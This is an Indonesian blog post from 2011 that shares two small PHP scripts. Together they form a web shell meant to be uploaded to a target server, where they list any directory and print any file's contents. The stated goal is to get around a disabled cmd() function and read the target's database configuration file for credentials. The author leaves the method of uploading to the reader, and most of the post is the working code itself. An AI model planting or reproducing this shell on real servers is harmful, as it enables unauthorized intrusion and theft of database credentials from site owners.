Searching...
Jumat, 25 Februari 2011

Browsing Folder server tanpa fungsi cmd()

Setelah cukup lama (maklum newbies) mencari ide bagaimana mengakali server yang mematikan fungsi  cmd()....untuk melihat isi dari folder dan membaca isi file-nya, karena hal ini penting untuk mendapatkan   konfigurasi database dari target (digunakan pada script expolit database via PHP script) maka saya membuat script sederhana (hanya untuk membaca folder dan isi dari file) dengan PHP ...saking sederhananya mungkin rekan-rekan lainnya sudah tahu (saya aja yang telat nih kayanya)

OK ... langsung saja ... script ini terdiri dari 2 buah file php
1. bukadir.php
2. baca.php
  • isi script
  • bukadir.php
<html>
<head>
<title>:..: Membaca Isi Folder by anstellwinkel :..:</title>
</head>
<body bgcolor="#666666">
<?php
if(!$Submit) {
echo "<center>DOCUMENT ROOT : $DOCUMENT_ROOT";
?>
<form name="hackdir" method="post" action="">
<table width="500">
<tr bgcolor="#000000">
<td width="112">Masukkan Path : </td>
<td width="300"><input name="dir" type="text" id="dir" size="50"></td>
</tr>
</table>
<input type="submit" name="Submit" value="Submit">
</form>
<a href="admindb.php">halaman muka</a>
<?php
}
else {
echo "<center>
path $dir.<p>";
$path = $dir;
$dir = opendir("$dir");
?>
<textarea cols="40" rows="25">
<?php
while ($baca = readdir($dir))
print("$baca \n");
closedir($dir);
?>
</textarea><br>
<br>Melihat Isi File
<form name="hackdir" method="post" action="baca.php">
<table width="475">
<tr bgcolor="#000000">
<td width="130">Masukkan nama file : </td>
<td width="320">
<input name="path" type="text" id="path" size="50" value="<? echo $path
?>"></td>
</tr>
</table>
<input type="submit" name="Submit" value="Submit">
</form>
<a href="admindb.php">halaman muka</a>
<?php
}
?>
</body>
</html>
pada script ini kita memasukkan path dari target berdasarkan document rootnya contoh :
DOCUMENT ROOT : ../../public_html/
Masukkan Path : /home/target_folder/public_html/
  • isi script
  • baca.php
<html>
<head>
<title>:..: Membaca Isi File by anstellwinkel :..:</title>
</head>
<body bgcolor="#666666">
<?php
if($Submit) {
$nama_file = "$path";
$isi_file = file($nama_file);
$jml_baris = sizeof($isi_file);
echo "<center>File $nama_file berisi $jml_baris baris.<p>";
?>
<textarea cols="80" rows="25">
<?php
for ($i=0; $i<$jml_baris; $i++)
{
print "$isi_file[$i]";
}
?>
</textarea></center>
<?php
}
?>
<a href="bukadir.php">kembali</a>
pada script ini masukkan nama file yang akan dilihat isinya contoh :
Masukkan nama file : /home/target_folder/public_html/configdb.php dan sebagai catatan script ini harus diupload keserver target....caranya terserah anda!!!!

fungsi dari script ini untuk mendapatkan file konfigurasi database target
--------------------------------------------------------------------------------------------
Shoutz:
~~~~~~~
~ forum|staff (roninmorgue, darkstar, admin, qnoyyy, gaga, kalion, WaferStick,
newbie, cloud)
~ mercubuana-it@yahoogroups.com ,
--------------------------------------------------------------------------------------------
Contact:
~~~~~~~~
roninmorgue || forum|staff
Homepage: http://www.forum.mercubuana-it.org/
email: roninmorgue[at]yahoo[dot]co[dot]id
----------------------------------- [ EOF ] ------------------------------------------------

0 comments:

Posting Komentar

Like & Share :


Mari budayakan berkomentar baik berupa Kritik, Saran, maupun Pertanyaan untuk menjadikan blog ini lebih baik ke depannya. Copy-Paste di ijinkan, tapi URL sumbernya disertakan.
Terima Kasih.

 
Back to top!